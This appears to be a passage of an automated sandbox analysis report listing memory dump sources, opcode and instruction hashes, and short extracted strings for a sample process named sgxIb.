                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction ID: 96c47c73f89d9e7e7dbb11c90b91485c1fc70b96e4adfe4aa1ae531306ecb499
                                                                                                            • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction Fuzzy Hash: AF11C476508280CFDB12CF14E9C4B55FF71FB84324F24C6AAD9495B656C33AD80ACB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: b6a76e1bb991478a92623036261d4d9f314ed9f98be9e85d42de4d2f269259cf
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: EC11D075508280CFDB01DF10D9C4B15BB72FB94328F24C6AEDA494B296C33AE84ACB52
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd79f863035f3ea598f08b4bb9edb61d4f62b6bbe221555c4e35909911054331
                                                                                                            • Instruction ID: 5a5f040c5581255a5ac4f50abcb7e9193eeabf646a4efc98e204feab5635b1e8
                                                                                                            • Opcode Fuzzy Hash: fd79f863035f3ea598f08b4bb9edb61d4f62b6bbe221555c4e35909911054331
                                                                                                            • Instruction Fuzzy Hash: AE11AFB5D01259AFCB10DF9AD884ADEFBF4FB49310F10812AE918B7241D374A954CBA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 64d1f4d47af82314c33bab60211d10888656ad0df896baa75d106da0f0e23736
                                                                                                            • Instruction ID: 19315f78a335751125d3ed2b3f010061482f3d53a8e2feda9b2a9618ac44c9d6
                                                                                                            • Opcode Fuzzy Hash: 64d1f4d47af82314c33bab60211d10888656ad0df896baa75d106da0f0e23736
                                                                                                            • Instruction Fuzzy Hash: B4018131B201201BDB68957DA411BAFA7DBDBCA714F25843EEA0EC7364DD61DC824395
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d9fa4c49d3e5afc07c7a7fd45d38b88c9da5270befade5ff1b3fbb0229a91e3
                                                                                                            • Instruction ID: 36abd628e5daf4d5dcb73bd2a0f93442cb31f6d3fd1c368c6d6fada7c24bae25
                                                                                                            • Opcode Fuzzy Hash: 5d9fa4c49d3e5afc07c7a7fd45d38b88c9da5270befade5ff1b3fbb0229a91e3
                                                                                                            • Instruction Fuzzy Hash: 60012471F100004FCBA8D6B8E49576E77D6EB8A709F124539E90ACB755ED25DC428380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f23dea6fb23d382b679b083109f9d145a07ba4fa95f256061e2dbe441f1f1f2b
                                                                                                            • Instruction ID: 43ac39beb54f825d0b4ad4a6406df6d11b90aa96106934d3d92d3af10b36e952
                                                                                                            • Opcode Fuzzy Hash: f23dea6fb23d382b679b083109f9d145a07ba4fa95f256061e2dbe441f1f1f2b
                                                                                                            • Instruction Fuzzy Hash: A9018C35B101101BDF65D67DA464B6E62DADBC9728F148839EA0EC7384EE61DC424786
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 554e627b8b505920019ff82e5b7787c2a24ca7829bf55529f246c3882029e186
                                                                                                            • Instruction ID: c58b6e8297788d1d6dcb0a70c23b1197087f089ac4bd80940c7954c4a8fe5b9a
                                                                                                            • Opcode Fuzzy Hash: 554e627b8b505920019ff82e5b7787c2a24ca7829bf55529f246c3882029e186
                                                                                                            • Instruction Fuzzy Hash: 3C01AD36F141155BEF9896A89C107EF33FBABC8314F01413AD90BE7384EE648C424792
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6cdcd804f8a476bd3e3c146aa0664518262362f4d71ae8ef051292fedb6bb13
                                                                                                            • Instruction ID: c74b74d6b6eed560397e9db9af9a97a361bf235ed862b4b2b06c1909b38c9328
                                                                                                            • Opcode Fuzzy Hash: c6cdcd804f8a476bd3e3c146aa0664518262362f4d71ae8ef051292fedb6bb13
                                                                                                            • Instruction Fuzzy Hash: 36018130B101114BCB68E6BCE49576E77DAEB8A719F104529E60EC7744DD21EC4287D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 010cc6e48bd6eea1d97e904c43df24b19e583ca87eb1ca4795d86c762d20fbfa
                                                                                                            • Instruction ID: 5f6682227e91db5084d690c5365400cbd98c1594d784ec925d91d1c938872bfe
                                                                                                            • Opcode Fuzzy Hash: 010cc6e48bd6eea1d97e904c43df24b19e583ca87eb1ca4795d86c762d20fbfa
                                                                                                            • Instruction Fuzzy Hash: EC01A431F202289BCF64AA7AE851A9DB779FB85354F00443DE905EB344EB72A8458BC1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9560278111645665e56bd31d5f1c241c7a0a2dc5ca5b18fc08c886d5584e2355
                                                                                                            • Instruction ID: ecbbfaab10e5112d1729c871b8a01c1d8767e82206aee38ab0d9ac8b7302cf1c
                                                                                                            • Opcode Fuzzy Hash: 9560278111645665e56bd31d5f1c241c7a0a2dc5ca5b18fc08c886d5584e2355
                                                                                                            • Instruction Fuzzy Hash: F9E0D8F1D151445FDF60CB748A0539E77A49B01204F6649E6CC08DB216F275CE418741
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 2b605f7732f9ead5cb9f1c379ef16fca24caebf3b997065f867a0b9c266bcaf1
                                                                                                            • Instruction ID: 4b40a1a639ab4b7c635f690ee883a4dabb3731d6cd11e76c9efedaa0bbf0e2db
                                                                                                            • Opcode Fuzzy Hash: 2b605f7732f9ead5cb9f1c379ef16fca24caebf3b997065f867a0b9c266bcaf1
                                                                                                            • Instruction Fuzzy Hash: 69122E30E002198FDB68DF65C854AADB7F2BF89304F2189A9D50AEB355DB349D85CF81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: ec7de44837fa4b416107bcf72853fe9f6adcbcff034c52b26b54daaa212b4752
                                                                                                            • Instruction ID: 113e55c4c33bd60b2f08dc4fb7cd17014cf35bf879aa8acb3ea641f93b5ff4ee
                                                                                                            • Opcode Fuzzy Hash: ec7de44837fa4b416107bcf72853fe9f6adcbcff034c52b26b54daaa212b4752
                                                                                                            • Instruction Fuzzy Hash: CA917E30E002099FEB6CEB65D995B6E7BF2BF44305F118629E802EB254DF749C85CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: dc3937bec30ca8c1a6b406e6d5cbd24370bb1ab8c5ab182657cecebd5be0d83e
                                                                                                            • Instruction ID: 2c151f25afa5c2ba2551f8deb955dce5bc24da5bacc0afc27c7c1dd2c96a240b
                                                                                                            • Opcode Fuzzy Hash: dc3937bec30ca8c1a6b406e6d5cbd24370bb1ab8c5ab182657cecebd5be0d83e
                                                                                                            • Instruction Fuzzy Hash: E9F13C30A00248CFDB58EBA9D594A6EB7F2FF84305F218469D806DB359DF759C82DB80
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 1341f1cf1783b6a5cad64009ce720340043f0f408da66154e96d6bf8a026208a
                                                                                                            • Instruction ID: 288e5efbf710cd66a3db6087b73642dd0b9c80c8a3d5741e09fbf052a5b280df
                                                                                                            • Opcode Fuzzy Hash: 1341f1cf1783b6a5cad64009ce720340043f0f408da66154e96d6bf8a026208a
                                                                                                            • Instruction Fuzzy Hash: 9471AE30E002198FDBA8DF68D4646ADB7F2FF95315B218869D80ADF254DF70AD45CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 2cfc57f7986c62abe7c66ff0701ac1e717cc9132480a0118a6b6e81acbcb6d35
                                                                                                            • Instruction ID: e122d4a0e62938359ef64371a250610edd69eabd06675d1b659103d6a92b1539
                                                                                                            • Opcode Fuzzy Hash: 2cfc57f7986c62abe7c66ff0701ac1e717cc9132480a0118a6b6e81acbcb6d35
                                                                                                            • Instruction Fuzzy Hash: D4B12B70E002188FDB54EB69D9946AEB7F2FF84301F25882AD906DB355DB75DC82CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731